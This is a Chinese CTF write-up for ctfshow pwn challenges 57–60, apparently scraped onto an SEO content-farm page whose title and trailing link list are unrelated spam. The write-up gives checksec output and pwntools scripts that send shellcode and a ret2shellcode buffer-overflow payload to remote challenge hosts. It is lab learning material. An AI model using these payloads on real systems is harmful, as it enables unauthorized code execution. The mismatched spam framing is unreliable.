当前位置: 首页 > news >正文

织梦cms怎么更改网站的路径云建站

织梦cms怎么更改网站的路径,云建站,旅游网站分析,深圳外贸网站建设哪家好目录 前言 一、pwn57(先了解一下简单的64位shellcode吧) 二、pwn58 三、pwn59(64位 无限制) 四、pwn60(入门难度shellcode) 前言 往前写了几道题,与shellcode有关,关于shellc…

目录

前言

一、pwn57(先了解一下简单的64位shellcode吧)

二、pwn58

三、pwn59(64位 无限制)

四、pwn60(入门难度shellcode)

前言

往前写了几道题,与shellcode有关,关于shellcode还不是太懂。


一、pwn57(先了解一下简单的64位shellcode吧

┌──(kali㉿kali)-[~/桌面/ctfshoww]
└─$ checksec --file=pwn57
[*] '/home/kali/桌面/ctfshoww/pwn57'Arch:       amd64-64-littleRELRO:      No RELROStack:      No canary foundNX:         NX unknown - GNU_STACK missingPIE:        No PIE (0x400000)Stack:      ExecutableStripped:   No

没啥。

应该也是直接执行:

from pwn import *
p=remote("pwn.challenge.ctf.show",28235)
p.interactive()


二、pwn58

┌──(kali㉿kali)-[~/桌面/ctfshoww]
└─$ checksec --file=pwn58
[*] '/home/kali/桌面/ctfshoww/pwn58'Arch:       i386-32-littleRELRO:      Partial RELROStack:      No canary foundNX:         NX unknown - GNU_STACK missingPIE:        No PIE (0x8048000)Stack:      ExecutableRWX:        Has RWX segmentsStripped:   No

也没有开啥保护。

logo明显提示用shellcode,所以我们需要发送sellcode。

Exp:

from pwn import *
e=ELF("./pwn58")
p=remote("pwn.challenge.ctf.show",28178)
shellcode=asm(shellcraft.sh())
payload=shellcode
p.sendline(payload)
p.interactive()


三、pwn59(64位 无限制

Checksec:

┌──(kali㉿kali)-[~/桌面/ctfshoww]
└─$ checksec --file=pwn59
[*] '/home/kali/桌面/ctfshoww/pwn59'Arch:       amd64-64-littleRELRO:      Partial RELROStack:      No canary foundNX:         NX unknown - GNU_STACK missingPIE:        No PIE (0x400000)Stack:      ExecutableRWX:        Has RWX segments
Stripped:   No

是64位的64位 无限制

也是写入shellcode。

看一下ROP:

ROPgadget --binary ./pwn50 --only "pop rbx|ret"

Gadgets information
============================================================
0x00000000004004fe : ret
0x0000000000400d74 : ret 0xfff9
0x0000000000400642 : ret 1Unique gadgets found: 3

ret=0x4004fe

一开始我是这样写的;

from pwn import *
p = remote('pwn.challenge.ctf.show',28256)
shellcode = asm(shellcraft.sh())
payload=shellcode
p.sendline(payload)
p.interactive()

但是打不通,问了问人机,加了一个架构,就能打通了:

from pwn import *
context.arch='amd64'
p = remote('pwn.challenge.ctf.show',28256)
shellcode = asm(shellcraft.sh())
payload=shellcode
p.sendline(payload)
p.interactive()


四、pwn60入门难度shellcode

查看一下程序:

┌──(kali㉿kali)-[~/桌面/ctfshoww]
└─$ checksec --file=pwn60
[*] '/home/kali/桌面/ctfshoww/pwn60'Arch:       i386-32-littleRELRO:      Partial RELROStack:      No canary foundNX:         NX unknown - GNU_STACK missingPIE:        No PIE (0x8048000)Stack:      ExecutableRWX:        Has RWX segmentsStripped:   NoDebuginfo:  Yes

没开什么保护。

主要是这个函数:

int __cdecl main(int argc, const char **argv, const char **envp)
{int v4; // [sp+1Ch] [bp-64h]@1setvbuf(stdout, 0, 2, 0);setvbuf(stdin, 0, 1, 0);puts("CTFshow-pwn can u pwn me here!!");gets((char *)&v4);strncpy(buf2, (const char *)&v4, 0x64u);printf("See you ~");return 0;
}

我们需要利用buf2,在其后面接shellcode

buf2_ar=0x804A080

我们需要用pwndbg确定一下:

确定偏移是112

Exp:

from pwn import *
context.log_level='debug'
p=remote("pwn.challenge.ctf.show",28264)
e=ELF("./pwn60")
buf2_ar=e.sym['buf2']
offset=112
shellcode=asm(shellcraft.sh())
payload=shellcode.ljust(offset,b'a')+p32(buf2_ar)
p.recvuntil("CTFshow-pwn can u pwn me here!!")
p.sendline(payload)
p.interactive()


继续学习中......

http://www.laogonggong.com/news/24003.html

相关文章:

  • 企业推广网站有哪些福州百度推广电话
  • 网站开发 php 书籍 推荐东莞网络营销网络推广系统
  • 电商网站开发技术难点微商软文
  • 深圳网站排名优化公司网页设计排版布局技巧
  • 网站编写软件百度产品优化排名软件
  • 怎么看网站用什么代码做的女教师遭网课入侵直播录屏曝光8
  • 网站流量怎么做湛江今日头条
  • 怎么做网站扫描外贸互联网推广的
  • wordpress用哪种缓存器看seo
  • 网站建设哪家专业手机百度最新正版下载
  • 网站标题有图片要怎么做新东方雅思培训机构官网
  • 电脑网站模板网络营销师证书怎么考
  • 网站建设问卷调查怎么自己做一个网页
  • 怎么用ps做网站幻灯片西安百度竞价托管公司
  • 印刷网站模板下载临沂做网站的公司
  • 成都市网站开发公司服务seo网站排名查询
  • 深圳网站开发公司青岛seo网络推广
  • 专业微信网站建设公司首选公司哪家好搜索引擎优化seo方案
  • 成品软件源码网站百度怎么进入官方网站
  • 开个小网站要怎么做的长沙网站推广
  • 苏州网站设计公司兴田德润好不好小红书seo关键词优化多少钱
  • 公司网站开发背景网络营销方案策划案例
  • 个体户做网站去哪里做搜索引擎优化seo
  • 重庆服务器托管seo免费视频教程
  • 网站开发简单公众号推广渠道
  • 大连网站推广排名找相似图片 识别
  • 帮别人做网站涉嫌诈骗如何优化seo技巧
  • 南山专业做网站公司大作设计网站
  • 重庆建设网站哪里好广告推广app
  • 唯品会一家做特卖的网站 分析做一个微信小程序需要多少钱